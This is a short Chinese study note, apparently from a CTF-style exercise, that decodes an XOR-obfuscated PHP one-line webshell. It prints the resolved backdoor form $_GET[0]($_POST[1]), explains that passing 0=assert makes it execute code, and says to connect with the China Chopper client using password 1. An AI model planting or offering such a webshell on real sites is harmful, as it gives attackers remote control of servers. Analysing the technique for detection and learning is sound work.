变形的一句话木马

变形的一句话木马

 

下图是一个解析的东西：这是个一句话木马的变形通过异或运算来规避所有的敏感函数。。。

 

下面是解题思路留下做个笔记一遍日后查看

首先发现是php源码

一开始不知道什么意思，看了一下百度后才发现原来是求出$_、$__、$___这三个值，用echo打印可以看到这三个分别为1、_GET、_POST，放入最后一条语句中刚好组成一个一句话病毒

首先整理下代码

这里面的异或运算过程如下

其实这是一句话木马的变种，整理下：

$_原来的值为0，经过$_++,变成1

将字符的异或进行计算，解得$__=_GET，$___=_POST
 

 

而$_布尔值为True，!$_则为False，值为0

整理${$__}[!$_](${$___}[$_]);得到 $_GET[0]($_POST[1])，是不是很眼熟，这其实就是一句话木马

提交参数0=assert，代码就变成了 

因此直接上菜刀，密码为1

                                  发明这个的人真是牛逼！！！！小白的感叹。。。。。